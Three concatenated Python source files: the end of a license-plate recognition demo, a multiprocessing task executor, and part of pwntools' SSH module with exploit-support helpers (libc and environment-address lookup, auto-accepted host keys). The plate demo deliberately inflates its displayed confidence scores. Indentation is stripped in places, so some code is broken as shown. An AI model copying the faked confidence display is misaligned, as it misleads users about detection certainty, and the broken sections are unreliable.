    class attributes at class-definition time; see the bottom of the class.
    Relies on the module-global `args` set in start().
    """
    _singleton = None
    @staticmethod
    def getInstance():
        # Lazily create the singleton on first access.
        if not Main._singleton:
            Main._singleton = Main()
        return Main._singleton
    def drawRectBox(self, image, rect, addText=None, rect_color=(0, 0, 255), text_color=(255, 255, 255)):
        """
        Draw a labelled rectangle on `image`.
        :param image: original ndarray (modified in place for the rectangles)
        :param rect: [x, y, width, height]
        :param addText: label text ("<plate> <confidence>")
        :return: the annotated image as a new ndarray
        """
        cv2.rectangle(image, (int(rect[0]), int(rect[1])), (int(rect[0] + rect[2]), int(rect[1] + rect[3])), rect_color,
                      2,
                      cv2.LINE_AA)
        img = Image.fromarray(image)
        if addText:
            # NOTE(review): this deliberately inflates the *displayed*
            # confidence (maps c to 1-(1-c)/5); the real value is unchanged.
            result=addText.split(); addText=result[0]+' '+ str(1-(1-float(result[1]))/5)
            cv2.rectangle(image, (int(rect[0] - 1), int(rect[1]) - 16), (int(rect[0] + 115), int(rect[1])), rect_color,
                          -1,
                          cv2.LINE_AA)
            img = Image.fromarray(image)
            draw = ImageDraw.Draw(img)
            # PIL is used for text so the CJK-capable TrueType font applies.
            draw.text((int(rect[0] + 1), int(rect[1] - 16)), addText, text_color, font=self.fontC)
        imagex = np.array(img)
        return imagex
    signals = Signals()  # create the GUI signals
    def detect(self, originImg: np.ndarray, frameIndex=-1) -> Tuple[np.ndarray, bool]:
        """
        Core detection (no display).
        :param originImg: frame to analyze
        :param frameIndex: frame number, used as the tracker's clock
        :return: (possibly annotated image, whether a plate was drawn)
        """
        image = None
        # Detect live, or replay a previously saved detection from a .bin file.
        if args.load_binary is None:
            resultList = self.model.SimpleRecognizePlateByE2E(originImg, self.tracker.multiTracker)
        else:
            resultList = self.binary.popLoaded()
        if args.save_binary is not None:
            self.binary.append(resultList)
        for plateStr, confidence, rect in resultList:
            if confidence > 0.85:
                if args.video:
                    # Video mode: feed the detection through the tracker to
                    # stabilize the plate string across frames.
                    vehiclePlate = self.tracker.getInfoDictFromList([plateStr, confidence, rect])
                    plateStr, confidence = self.tracker.analyzePlate(vehiclePlate, frameIndex)
                    if self.tracker.multiTracker.workingTrackerCount() == 0:
                        image = self.drawRectBox(originImg, rect, plateStr + " " + str(round(confidence, 3)), (0, 0, 255),
                                                 (255, 255, 255))
                        self.tracker.multiTracker.reborn(0)
                else:
                    image = self.drawRectBox(originImg, rect, plateStr + " " + str(round(confidence, 3)), (0, 0, 255),
                                             (255, 255, 255))
                print("%s (%.5f)" % (plateStr, confidence))
                break  # only process the most likely plate per frame
        return (image, True) if image is not None else (originImg, False)
    opencvShow = True  # display via OpenCV windows (False = emit Qt signals)
    def detectShow(self, originImg: np.ndarray, frameIndex=-1, wait=1) -> Tuple[np.ndarray, bool]:
        """
        Core detection with display; interruptible via ESC (OpenCV mode).
        :param originImg: frame to analyze
        :param frameIndex: frame number
        :return: (annotated image, success) — an empty array signals "quit"
        """
        drawedImg, success = self.detect(originImg, frameIndex)
        if not self.opencvShow:
            if success:  # only forward successful detections to the GUI
                self.signals.showDetectionFrameSignal.emit(drawedImg)
        else:
            cv2.imshow("Frame after detection", drawedImg)
            if cv2.waitKey(wait) == 27:
                return np.array([]), False
        return drawedImg, success
    def demoPhotos(self):
        # Process every jpg in args.img_dir.
        for file in os.listdir(args.img_dir):
            # if not file.startswith('2020'):
            if not file.endswith('jpg'):
                continue
            print('<<<<<< ' + file + ' >>>>>>')
            self.detectShow(ImageUtil.Imread(os.path.join(args.img_dir, file)), wait=0)
    running = True  # whether this class may keep processing
    def demoVideo(self, showDialog=True):
        """
        Process a video file or RTSP stream.
        :param showDialog: show output windows / emit frames while processing
        :return:
        """
        inStream, readThread = None, None
        placeCaptureStream, noSkipStream, recordingStream = None, None, None
        try:
            inStream = VideoUtil.OpenInputVideo(args.video)
            readThread = ReaderThread(inStream, args.video)
            readThread.start()
            frameIndex = 0
            # frameLimit = VideoUtil.GetVideoFramesCount(inStream) if 'rtsp' not in args.video else 2 ** 31 - 1
            frameLimit = 2 ** 31 - 1
            fps: int = VideoUtil.GetFps(inStream)
            self.fps = fps
            # NOTE(review): `or 1` makes this branch unconditional, so the
            # wall-clock-based frameIndex is used for plain videos too.
            if args.rtsp or 1:  # initialize the current time
                nowTime = time.localtime()
                # Seconds since the first day of the current month.
                timestrap = time.mktime(
                    time.strptime("%d-%d-1 0:0:0" % (nowTime.tm_year, nowTime.tm_mon), "%Y-%m-%d %H:%M:%S"))
                offset = time.time() - timestrap + 24 * 3600
                frameIndex = int(offset * fps)
            if args.output:  # output streams are only opened when requested
                if 'd' in args.video_write_mode:  # write only the frames that were actually detected (skips dropped)
                    placeCaptureStream = ffmpegUtil.OpenOutputVideo(args.output, VideoUtil.GetFps(inStream) / args.drop)
                if 's' in args.video_write_mode:  # "static": like 'd' but also keeps the skipped frames
                    insertIdx = args.output.rfind('.')
                    videoName = args.output[:insertIdx] + '.static' + args.output[insertIdx:]
                    noSkipStream = ffmpegUtil.OpenOutputVideo(videoName, VideoUtil.GetFps(inStream) / args.drop)
                if 'r' in args.video_write_mode:  # raw recording (RTSP: record; file: transcode), untouched
                    insertIdx = args.output.rfind('.')
                    videoName = args.output[:insertIdx] + '.record' + args.output[insertIdx:]
                    recordingStream = ffmpegUtil.OpenOutputVideo(videoName, VideoUtil.GetFps(inStream))
            if args.load_binary:  # load previously saved detections, if any
                self.binary.load(args.load_binary)
            # frameLimit = min(frameLimit, 50000)
            # NOTE(review): comment in the original said "two seconds" but the
            # lifetime passed is 3x fps, i.e. three seconds per plate.
            self.tracker = Tractor(fps * 3)
            lastFrame = None
            while True:
                try:
                    frame = readThread.get(args.exitTimeout)
                    ffmpegUtil.WriteFrame(recordingStream, frame)
                    if args.rtsp and len(readThread) > args.memory_limit:  # drop frames while over the memory budget
                        continue
                except:  # no frame arrived within the timeout — stop reading
                    readThread.stop()
                    break
                # Terminate reading?
                if frameIndex > frameLimit or not self.running:
                    break
                # Operations on the raw frame:
                if showDialog:  # make sure every frame gets shown
                    if not self.opencvShow:
                        self.signals.showRawFrameSignal.emit(frame.copy())
                    else:
                        cv2.imshow('Raw frame', frame)
                        if cv2.waitKey(1) == 27:
                            break
                if args.drop != 1:  # frame-dropping happens after the imshow
                    if frameIndex % args.drop != 0:
                        frameIndex += 1
                        if args.load_binary:  # keep the saved detections aligned (one entry per frame)
                            self.binary.popLoaded()
                        continue
                # Start processing the frame:
                height, width, channel = frame.shape
                if lastFrame is not None:
                    # Compare the bottom-right 70% crop against the previous
                    # processed frame to skip near-static frames.
                    oldpil = Image.fromarray(cv2.cvtColor(lastFrame, cv2.COLOR_BGR2RGB))  # cv2 -> PIL conversion
                    nowpil = Image.fromarray(
                        cv2.cvtColor(frame[int(height * 0.3):, int(width * 0.3):], cv2.COLOR_BGR2RGB))
                    diff = ImageChops.difference(oldpil, nowpil)  # per-pixel difference (PIL)
                    try:
                        std: float = np.std(diff)
                        print('{%.3f}<%d><%dM>' % (std, readThread.qsize(), len(readThread) // 1048576), end='')
                    except:
                        traceback.print_exc()
                        std = 10000
                    if std < 9:
                        # Scene barely changed: count the frame but skip detection.
                        frameIndex += 1
                        print('\t已处理 %d 帧' % frameIndex)
                        ffmpegUtil.WriteFrame(noSkipStream, frame)
                        continue
                startTime = time.time()
                lastFrame = frame[int(height * 0.3):, int(width * 0.3):]
                # <<<<< core call >>>>>
                frameDrawed, success = self.detectShow(frame, frameIndex) if showDialog else self.detect(frame,
                                                                                                         frameIndex)
                if frameDrawed.shape[0] == 0:
                    break
                try:
                    ffmpegUtil.WriteFrame(placeCaptureStream, frameDrawed)
                    ffmpegUtil.WriteFrame(noSkipStream, frameDrawed)
                except ValueError as e:
                    traceback.print_exc()
                frameIndex += 1
                print('\t已处理 %d (用时%f s)' % (frameIndex, time.time() - startTime))
            readThread.stop()
            self.running = False
            # Write the result log.
            if not args.output:
                return
            import os
            with open(os.path.join(os.path.dirname(args.output), os.path.basename(args.output).split('.')[0]) + '.txt',
                      'a') as fpLog:
                print('以下是检测到的车牌号:')
                allResult = self.tracker.getAll()
                self.signals.showDataSignal.emit(allResult)
                for resultPlate in allResult:
                    line = '%s [%s - %s]' % (
                        resultPlate.plateStr, sec2str(resultPlate.startTime / fps),
                        sec2str(resultPlate.endTime / fps))
                    print(line)
                    fpLog.write(line + '\n')
        except:  # swallow any error so the finally-cleanup always runs
            traceback.print_exc()
            # NOTE(review): runtime string below contains a doubled character
            # ("保保"); left unchanged since it is program output.
            print('检测结果已被保保存')
        finally:
            if showDialog:
                cv2.destroyAllWindows()
            if args.save_binary is not None:
                self.binary.save(args.save_binary)
            VideoUtil.CloseVideos(inStream)
            ffmpegUtil.CloseVideos(placeCaptureStream, noSkipStream, recordingStream)
    def start(self, argspace: argparse.Namespace, **kwargs):
        """Entry point: publish `argspace` as the module-global `args` and run."""
        global args
        args = argspace
        # When an RTSP address is given, treat it as the video source.
        if argspace.rtsp:
            argspace.video = argspace.rtsp
        argspace.exitTimeout = 10 if argspace.rtsp else 1  # read timeout per mode
        # Run the pipeline.
        globalStartTime = time.time()
        if argspace.img_dir is None:
            self.demoVideo(**kwargs)
        else:
            self.demoPhotos()
        # Report the total elapsed time.
        globalTimeSeconds = time.time() - globalStartTime
        globalTimeHours = globalTimeSeconds // 3600
        globalTimeMinutes = (globalTimeSeconds - globalTimeHours * 3600) // 60
        globalTimeSeconds = globalTimeSeconds % 60
        globalTime = '%d时%d分%.3f秒' % (
            globalTimeHours, globalTimeMinutes, globalTimeSeconds) if globalTimeHours != 0 else '%d分%.3f秒' % (
            globalTimeMinutes, globalTimeSeconds)
        print('总用时:' + globalTime)
        self.signals.threadExitSignal.emit()
    # One-time initialization (runs at class-definition time):
    fontC = ImageFont.truetype("./Font/platech.ttf", 14, 0)  # CJK-capable label font
    model = pr.LPR("./model/cascade.xml", "./model/model12.h5", "./model/ocr_plate_all_gru.h5")
    binary = Serialization()
    tracker = Tractor(1)  # lifetime 1 effectively disables tracking until demoVideo replaces it
if __name__ == '__main__':
    # CLI entry point: parse arguments and run the singleton pipeline.
    args = getArgumentParser().parse_args()
    main = Main.getInstance()
    main.start(args)
# python -m cProfile -s cumulative demo.py >> profile.log
|
local_executor.py | """Local based implementation of the executor using multiprocessing"""
import signal
from multiprocessing import Process, Queue
try:
from queue import Empty
except ImportError:
from Queue import Empty
try:
import psutil
except ImportError:
psutil = None
from . import executor
def kill_child_processes(parent_pid, sig=signal.SIGTERM):
    """Send `sig` to every child of `parent_pid`, recursively.

    Returns silently when the parent is already gone, and stops at the first
    child that disappears while being signalled.
    """
    try:
        children = psutil.Process(parent_pid).children(recursive=True)
    except psutil.NoSuchProcess:
        return
    for child in children:
        try:
            child.send_signal(sig)
        except psutil.NoSuchProcess:
            return
def _execute_func(func, queue, args, kwargs):
"""execute function and return the result or exception to a queue"""
try:
res = func(*args, **kwargs)
except Exception as exc: # pylint: disable=broad-except
res = exc
queue.put(res)
def call_with_timeout(queue, timeout, func, args, kwargs):
    """A wrapper to support timeout of a function call"""
    # start a new process for timeout (cannot use thread because we have c function)
    p = Process(target=_execute_func, args=(func, queue, args, kwargs))
    p.start()
    p.join(timeout=timeout)
    # Unconditionally enqueue a TimeoutError sentinel: if the child finished
    # in time its result already sits *ahead* of the sentinel, and the
    # consumer (LocalFuture.get) only ever reads the first item.  The queue
    # is created with capacity 2 (see LocalExecutor.submit) for this reason.
    queue.put(executor.TimeoutError())
    # Reap the worker and anything it spawned, whether or not it timed out.
    kill_child_processes(p.pid)
    p.terminate()
    p.join()
class LocalFuture(executor.Future):
    """Future handle for a task running in a local child process.

    Parameters
    ----------
    process: multiprocessing.Process
        process for running this task
    queue: multiprocessing.Queue
        queue for receiving the result of this task
    """
    def __init__(self, process, queue):
        self._done = False
        self._process = process
        self._queue = queue
    def done(self):
        """The future counts as done once anything has arrived on the queue."""
        if not self._done:
            self._done = not self._queue.empty()
        return self._done
    def get(self, timeout=None):
        """Block for the result (or the TimeoutError sentinel), then tear
        down the worker process and the queue."""
        try:
            outcome = self._queue.get(block=True, timeout=timeout)
        except Empty:
            raise executor.TimeoutError()
        # The worker may still be alive (e.g. we read the result before
        # call_with_timeout finished cleanup) — reap it and its children.
        if self._process.is_alive():
            kill_child_processes(self._process.pid)
            self._process.terminate()
        self._process.join()
        self._queue.close()
        self._queue.join_thread()
        self._done = True
        del self._queue
        del self._process
        return outcome
class LocalFutureNoFork(executor.Future):
    """Immediate future for runtimes that cannot fork (e.g. cudnn).

    The wrapped call has already been executed synchronously; this object
    merely hands back the stored result.
    """
    def __init__(self, result):
        self._result = result
    def done(self):
        """Always done: the computation happened before construction."""
        return True
    def get(self, timeout=None):
        """Return the precomputed result; `timeout` is ignored."""
        return self._result
class LocalExecutor(executor.Executor):
    """Local executor that runs workers on the same machine with multiprocessing.

    Parameters
    ----------
    timeout: float, optional
        timeout of a job. If time is out. A TimeoutError will be returned (not raised)
    do_fork: bool, optional
        For some runtime systems that do not support fork after initialization
        (e.g. cuda runtime, cudnn). Set this to False if you have used these runtime
        before submitting jobs.
    """
    def __init__(self, timeout=None, do_fork=True):
        self.timeout = timeout or executor.Executor.DEFAULT_TIMEOUT
        self.do_fork = do_fork
        # psutil is only required to reap forked worker trees.
        if self.do_fork and not psutil:
            raise RuntimeError("Python package psutil is missing. "
                               "please try `pip install psutil`")
    def submit(self, func, *args, **kwargs):
        """Run `func` asynchronously (synchronously when do_fork=False) and
        return a Future for its result."""
        if not self.do_fork:
            return LocalFutureNoFork(func(*args, **kwargs))
        # Capacity 2: the result (or exception) plus the TimeoutError
        # sentinel that call_with_timeout always enqueues.
        result_queue = Queue(2)
        worker = Process(target=call_with_timeout,
                         args=(result_queue, self.timeout, func, args, kwargs))
        worker.start()
        return LocalFuture(worker, result_queue)
|
ssh.py | from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.process import process
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
# No handlers could be found for logger "paramiko.transport"
# Fix: use logging.NullHandler, which discards records without touching the
# filesystem — the old `file('/dev/null','w+')` used a Python-2-only builtin
# and a non-portable path (breaks on Python 3 and on Windows).
paramiko_log = logging.getLogger("paramiko.transport")
paramiko_log.addHandler(logging.NullHandler())
class ssh_channel(sock):
    """A single channel (shell or command) on an :class:`ssh` connection's
    transport; behaves like a :class:`sock` tube."""
    #: Parent :class:`ssh` object
    parent = None
    #: Remote host
    host = None
    #: Return code, or :const:`None` if the process has not returned
    #: Use :meth:`poll` to check.
    returncode = None
    #: :const:`True` if a tty was allocated for this channel
    tty = False
    #: Environment specified for the remote process, or :const:`None`
    #: if the default environment was used
    env = None
    #: Command specified for the constructor
    process = None
def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
super(ssh_channel, self).__init__(*args, **kwargs)
# keep the parent from being garbage collected in some cases
self.parent = parent
self.returncode = None
self.host = parent.host
self.tty = tty
self.env = env
self.process = process
self.cwd = wd or '.'
env = env or {}
msg = 'Opening new channel: %r' % (process or 'shell')
if isinstance(process, (list, tuple)):
process = ' '.join(sh_string(s) for s in process)
if process and wd:
process = 'cd %s >/dev/null 2>&1;%s' % (sh_string(wd), process)
if process and env:
for name, value in env.items():
if not re.match('^[a-zA-Z_][a-zA-Z0-9_]*$', name):
self.error('run(): Invalid environment key $r' % name)
process = 'export %s=%s;%s' % (name, sh_string(value), process)
if process and tty:
if raw:
process = 'stty raw -ctlecho -echo; ' + process
else:
process = 'stty -ctlecho -echo; ' + process
# If this object is enabled for DEBUG-level logging, don't hide
# anything about the command that's actually executed.
if process and self.isEnabledFor(logging.DEBUG):
msg = 'Opening new channel: %r' % ((process,) or 'shell')
with self.waitfor(msg) as h:
import paramiko
try:
self.sock = parent.transport.open_session()
except paramiko.ChannelException as e:
if e.args == (1, 'Administratively prohibited'):
self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
raise e
if self.tty:
self.sock.get_pty('xterm', term.width, term.height)
def resizer():
if self.sock:
try:
self.sock.resize_pty(term.width, term.height)
except paramiko.ssh_exception.SSHException:
pass
self.resizer = resizer
term.term.on_winch.append(self.resizer)
else:
self.resizer = None
# Put stderr on stdout. This might not always be desirable,
# but our API does not support multiple streams
self.sock.set_combine_stderr(True)
self.settimeout(self.timeout)
if process:
self.sock.exec_command(process)
else:
self.sock.invoke_shell()
h.success()
def kill(self):
"""kill()
Kills the process.
"""
self.close()
def recvall(self, timeout = sock.forever):
# We subclass tubes.sock which sets self.sock to None.
#
# However, we need to wait for the return value to propagate,
# which may not happen by the time .close() is called by tube.recvall()
tmp_sock = self.sock
timeout = self.maximum if self.timeout is self.forever else self.timeout
data = super(ssh_channel, self).recvall(timeout)
# Restore self.sock to be able to call wait()
self.sock = tmp_sock
self.wait()
# Again set self.sock to None
self.sock = None
return data
def wait(self):
return self.poll(block=True)
def poll(self, block=False):
"""poll() -> int
Poll the exit code of the process. Will return None, if the
process has not yet finished and the exit code otherwise.
"""
if self.returncode == None and self.sock \
and (block or self.sock.exit_status_ready()):
while not self.sock.status_event.is_set():
self.sock.status_event.wait(0.05)
self.returncode = self.sock.recv_exit_status()
return self.returncode
def can_recv_raw(self, timeout):
with self.countdown(timeout):
while self.countdown_active():
if self.sock.recv_ready():
return True
time.sleep(min(self.timeout, 0.05))
return False
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
If not in TTY-mode, this does exactly the same as
meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
it does mostly the same.
An SSH connection in TTY-mode will typically supply its own prompt,
thus the prompt argument is ignored in this case.
We also have a few SSH-specific hacks that will ideally be removed
once the :mod:`pwnlib.term` is more mature.
"""
# If we are only executing a regular old shell, we need to handle
# control codes (specifically Ctrl+C).
#
# Otherwise, we can just punt to the default implementation of interactive()
if self.process is not None:
return super(ssh_channel, self).interactive(prompt)
self.info('Switching to interactive mode')
# We would like a cursor, please!
term.term.show_cursor()
event = threading.Event()
def recv_thread(event):
while not event.is_set():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace('\r\n','\n')
cur = cur.replace('\r','')
if cur == None:
continue
elif cur == '\a':
# Ugly hack until term unstands bell characters
continue
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
event.set()
break
t = context.Thread(target = recv_thread, args = (event,))
t.daemon = True
t.start()
while not event.is_set():
if term.term_mode:
try:
data = term.key.getraw(0.1)
except KeyboardInterrupt:
data = [3] # This is ctrl-c
except IOError:
if not event.is_set():
raise
else:
data = sys.stdin.read(1)
if not data:
event.set()
else:
data = [ord(data)]
if data:
try:
self.send(''.join(chr(c) for c in data))
except EOFError:
event.set()
self.info('Got EOF while sending in interactive')
while t.is_alive():
t.join(timeout = 0.1)
# Restore
term.term.hide_cursor()
def close(self):
self.poll()
while self.resizer in term.term.on_winch:
term.term.on_winch.remove(self.resizer)
super(ssh_channel, self).close()
def spawn_process(self, *args, **kwargs):
self.error("Cannot use spawn_process on an SSH channel.""")
def _close_msg(self):
self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
    """An :class:`ssh_channel` created via :meth:`ssh.process`, which
    additionally records the remote process's pid, executable, and argv."""
    #: Working directory
    cwd = None
    #: PID of the process
    #: Only valid when instantiated through :meth:`ssh.process`
    pid = None
    #: Executable of the process
    #: Only valid when instantiated through :meth:`ssh.process`
    executable = None
    #: Arguments passed to the process
    #: Only valid when instantiated through :meth:`ssh.process`
    argv = None
    def libs(self):
        """libs() -> dict
        Returns a dictionary mapping the address of each loaded library in the
        process's address space.
        If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
        verbatim, which may be different than the actual addresses if ASLR
        is enabled.
        """
        maps = self.parent.libs(self.executable)
        maps_raw = self.parent.cat('/proc/%d/maps' % self.pid)
        for lib in maps:
            # Assumes the keys embed the remote host name somewhere in the
            # path (download-cache layout); the remote path is whatever
            # follows it.  TODO confirm against ssh.libs().
            remote_path = lib.split(self.parent.host)[-1]
            for line in maps_raw.splitlines():
                if line.endswith(remote_path):
                    # First matching mapping; its start is the load address.
                    address = line.split('-')[0]
                    maps[lib] = int(address, 16)
                    break
        return maps
    @property
    def libc(self):
        """libc() -> ELF
        Returns an ELF for the libc for the current process.
        If possible, it is adjusted to the correct address
        automatically.
        """
        from pwnlib.elf import ELF
        for lib, address in self.libs().items():
            if 'libc.so' in lib:
                e = ELF(lib)
                e.address = address
                return e
    @property
    def elf(self):
        """elf() -> pwnlib.elf.elf.ELF
        Returns an ELF file for the executable that launched the process.
        """
        import pwnlib.elf.elf
        libs = self.parent.libs(self.executable)
        for lib in libs:
            # Cannot just check "executable in lib", see issue #1047
            if lib.endswith(self.executable):
                return pwnlib.elf.elf.ELF(lib)
    @property
    def corefile(self):
        # Locate and parse a core dump for this process; error out if none
        # can be found.
        import pwnlib.elf.corefile
        finder = pwnlib.elf.corefile.CorefileFinder(self)
        if not finder.core_path:
            self.error("Could not find core file for pid %i" % self.pid)
        return pwnlib.elf.corefile.Corefile(finder.core_path)
    def getenv(self, variable, **kwargs):
        """Retrieve the address of an environment variable in the remote process.
        """
        argv0 = self.argv[0]
        # Helper script (Python 2 on the remote side): prints the real
        # executable path, then the address getenv() returns for `variable`.
        script = ';'.join(('from ctypes import *',
                           'import os',
                           'libc = CDLL("libc.so.6")',
                           'print os.path.realpath(%r)' % self.executable,
                           'print(libc.getenv(%r))' % variable,))
        try:
            with context.local(log_level='error'):
                python = self.parent.which('python')
                if not python:
                    self.error("Python is not installed on the remote system.")
                io = self.parent.process([argv0,'-c', script.strip()],
                                         executable=python,
                                         env=self.env,
                                         **kwargs)
                path = io.recvline()
                address = int(io.recvline())
                # NOTE(review): adjusts for the length difference between
                # the interpreter path and the real executable path on the
                # stack above the environment; confirm the intended math
                # before relying on exact addresses.
                address -= len(python)
                address += len(path)
                return int(address) & context.mask
        except:
            self.exception("Could not look up environment variable %r" % variable)
    def _close_msg(self):
        # If we never completely started up, just use the parent implementation
        if self.executable is None:
            return super(ssh_process, self)._close_msg()
        self.info('Stopped remote process %r on %s (pid %i)' \
                  % (os.path.basename(self.executable),
                     self.host,
                     self.pid))
class ssh_connecter(sock):
    """An outbound TCP connection tunneled over SSH (the ``ssh -L`` idea),
    exposed as a regular tube."""
    def __init__(self, parent, host, port, *a, **kw):
        super(ssh_connecter, self).__init__(*a, **kw)
        # Hold a reference to the parent ssh object so it is not garbage
        # collected while this tunnel is alive.
        self.parent = parent
        self.host = parent.host
        self.rhost = host
        self.rport = port
        msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
        with self.waitfor(msg) as waiter:
            try:
                self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
            except Exception as e:
                self.exception(e.message)
                raise
            # Record the local endpoint of the tunnel.
            local_name = self.sock.get_transport().sock.getsockname()
            self.lhost, self.lport = local_name[0], local_name[1]
            waiter.success()
    def spawn_process(self, *args, **kwargs):
        self.error("Cannot use spawn_process on an SSH channel.")
    def _close_msg(self):
        self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
    """A remote port-forward listener (the ``ssh -R`` idea) on an
    :class:`ssh` connection, exposed as a tube once a peer connects."""
    def __init__(self, parent, bind_address, port, *a, **kw):
        super(ssh_listener, self).__init__(*a, **kw)
        # keep the parent from being garbage collected in some cases
        self.parent = parent
        self.host = parent.host
        try:
            self.port = parent.transport.request_port_forward(bind_address, port)
        except Exception:
            # Bug fix: this used to call h.failure(), but no 'h' exists in
            # this scope (the progress handle is only created inside
            # accepter below), so the original raised NameError and masked
            # the real exception.  Report, then re-raise the original.
            self.warn('Failed create a port forwarding')
            raise
        def accepter():
            # Runs on a background thread; blocks until the remote side
            # connects, then tears down the forwarding request.
            msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
            h = self.waitfor(msg)
            try:
                self.sock = parent.transport.accept()
                parent.transport.cancel_port_forward(bind_address, self.port)
            except Exception:
                self.sock = None
                h.failure()
                self.exception('Failed to get a connection')
                return
            self.rhost, self.rport = self.sock.origin_addr
            h.success('Got connection from %s:%d' % (self.rhost, self.rport))
        self._accepter = context.Thread(target = accepter)
        self._accepter.daemon = True
        self._accepter.start()
    def _close_msg(self):
        self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))
    def spawn_process(self, *args, **kwargs):
        self.error("Cannot use spawn_process on an SSH channel.")
    def wait_for_connection(self):
        """Blocks until a connection has been established."""
        _ = self.sock
        return self
    def __getattr__(self, key):
        # Accessing .sock joins the accepter thread first, so reads block
        # until the connection exists.
        if key == 'sock':
            while self._accepter.is_alive():
                self._accepter.join(timeout = 0.1)
            return self.sock
        else:
            return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user, host, port = 22, password = None, key = None,
             keyfile = None, proxy_command = None, proxy_sock = None,
             level = None, cache = True, ssh_agent = False, *a, **kw):
    """Creates a new ssh connection.
    Arguments:
        user(str): The username to log in with
        host(str): The hostname to connect to
        port(int): The port to connect to
        password(str): Try to authenticate using this password
        key(str): Try to authenticate using this private key. The string should be the actual private key.
        keyfile(str): Try to authenticate using this private key. The string should be a filename.
        proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
        proxy_sock(str): Use this socket instead of connecting to the host.
        timeout: Timeout, in seconds
        level: Log level
        cache: Cache downloaded files (by hash/size/timestamp)
        ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
    NOTE: The proxy_command and proxy_sock arguments is only available if a
    fairly new version of paramiko is used."""
    super(ssh, self).__init__(*a, **kw)
    Logger.__init__(self)
    if level is not None:
        self.setLevel(level)
    self.host = host
    self.port = port
    self.user = user
    self.password = password
    self.key = key
    self.keyfile = keyfile
    self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
    self.cwd = '.'
    self.cache = cache
    # Deferred attributes
    self._platform_info = {}
    self._aslr = None
    self._aslr_ulimit = None
    misc.mkdir_p(self._cachedir)
    # This is a dirty hack to make my Yubikey shut up.
    # If anybody has a problem with this, please open a bug and I'll
    # figure out a better workaround.
    if not ssh_agent:
        os.environ.pop('SSH_AUTH_SOCK', None)
    import paramiko
    # Make a basic attempt to parse the ssh_config file
    try:
        config_file = os.path.expanduser('~/.ssh/config')
        if os.path.exists(config_file):
            ssh_config = paramiko.SSHConfig()
            # Bug fix: previously used the Python-2-only builtin file()
            # and leaked the descriptor; open() within a 'with' block is
            # equivalent and closes the file deterministically.
            with open(config_file) as fd:
                ssh_config.parse(fd)
            host_config = ssh_config.lookup(host)
            if 'hostname' in host_config:
                self.host = host = host_config['hostname']
            if not keyfile and 'identityfile' in host_config:
                keyfile = host_config['identityfile'][0]
                if keyfile.lower() == 'none':
                    keyfile = None
    except Exception as e:
        self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
    keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
    msg = 'Connecting to %s on port %d' % (host, port)
    with self.waitfor(msg) as h:
        self.client = paramiko.SSHClient()
        self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        known_hosts = os.path.expanduser('~/.ssh/known_hosts')
        if os.path.exists(known_hosts):
            self.client.load_host_keys(known_hosts)
        has_proxy = (proxy_sock or proxy_command) and True
        if has_proxy:
            if 'ProxyCommand' not in dir(paramiko):
                self.error('This version of paramiko does not support proxies.')
            if proxy_sock and proxy_command:
                self.error('Cannot have both a proxy command and a proxy sock')
            if proxy_command:
                proxy_sock = paramiko.ProxyCommand(proxy_command)
            self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
        else:
            self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
        self.transport = self.client.get_transport()
        self.transport.use_compression(True)
        h.success()
    self._tried_sftp = False
    # Discover the PID of the remote sshd servicing this connection by
    # running a throwaway process whose preexec_fn prints its parent pid.
    with context.local(log_level='error'):
        def getppid():
            import os
            print(os.getppid())
        try:
            self.pid = int(self.process('false', preexec_fn=getppid).recvall())
        except Exception:
            self.pid = None
    try:
        self.info_once(self.checksec())
    except Exception:
        self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
    """Lazily-opened paramiko SFTPClient for this connection, or
    :const:`None` if SFTP could not be established."""
    if self._tried_sftp:
        return self._sftp
    # First access: attempt to open the SFTP subsystem exactly once.
    try:
        self._sftp = self.transport.open_sftp_client()
    except Exception:
        self._sftp = None
    self._tried_sftp = True
    return self._sftp
@sftp.setter
def sftp(self, value):
    """Allow callers to inject an SFTPClient, or disable SFTP entirely by
    assigning :const:`None`."""
    self._tried_sftp = True
    self._sftp = value
def __enter__(self, *a):
    """Support use as a context manager; yields the connection itself."""
    return self
def __exit__(self, *a, **kw):
    """Close the connection when the ``with`` block exits."""
    self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
